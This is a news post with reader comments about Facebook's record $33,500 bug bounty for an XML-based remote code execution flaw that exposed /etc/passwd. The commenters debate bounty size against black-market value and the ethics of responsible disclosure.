Facebook's Biggest Bounty Yet To Hacker Who Found "Keys To the Kingdom"

mask.of.sanity writes "Facebook has paid out its largest bug bounty of $33,500 for a serious remote code execution vulnerability which also returned Facebook's etc/passwd. The researcher could change Facebook's use of Gmail as an OpenID provider to a URL he controlled, and then sent a request carrying malicious XML code. The Facebook response included its etc/passwd which contained essential login information such as system administrator data and user IDs. The company quickly patched the flaw and awarded him for the proof of concept remote code execution which he quietly disclosed to them."

Wow

Stingy reward. That would have fetched quite a bit more on the black/open market.

Re:Crime does pay

[sandytaru]

Yes, but now he's got a couple of white hat security firms considering offering him more than whatever he's making now, without the risk of jail time to boot.

Props to this guy

[thedillybar]

Nice to associate the term "hacker" with "honest" once in a while

/etc/password, not /etc/shadow!

It's a demonstration of file system traversal vulnerability. Most likely the application is run as under an unprivileged user account which surely does not have access rights to read /etc/shadow, however it has access to own configuration files that may reveal much more information than the hashes of passwords of root. And if Facebook admins have some clue then their own user accounts are not even in the system but on a central authentication server along with the passwords. Anyway, content of /etc/password is more than enough for the demonstration.

Re:Crime does pay

[vux984]

$33,500? He probably could have gotten WAY more on the black market. This is ultimately the problem with stingy bug bounties.

How is it a problem?

Its a fact of life that we are daily confronted between the choice to do the right thing and the choice to screw someone over for money.

My neighbor went on vacation, they gave me the keys to the house to water the plants, and bring in her mail. I could turn a tidy profit passing the information that the house is empty to a ring of thieves, steal her identity, and strip her car.

Or I can just water the plants and usually receive a bottle of wine or other small thank you gift.

  I had the 'keys to her kingdom', and she repaid my responsible behaviour with a token. Should I complain she's being stingy, and call it a huge problem too?

Re:Crime does pay

[HoldmyCauls]

This. Not everyone worth their salt in security sees financial gain as the sole objective, or there would be no honest work left in the world. Would the GP recommend to a factory worker that if he just stole 10 of the devices on the conveyor a day, or drove the forklift full of pallets to his house, he could make his yearly wage in a week? If you work on the wrong side of the law (in this case, the laws being entirely ethical as so much is at stake), you are not guaranteed to not get caught, nor are you guaranteed a working wage after finding and selling a flaw. Jailtime and honest work in this case are carrot/stick factors deciding how finding the exploit is to the benefit of the discoverer.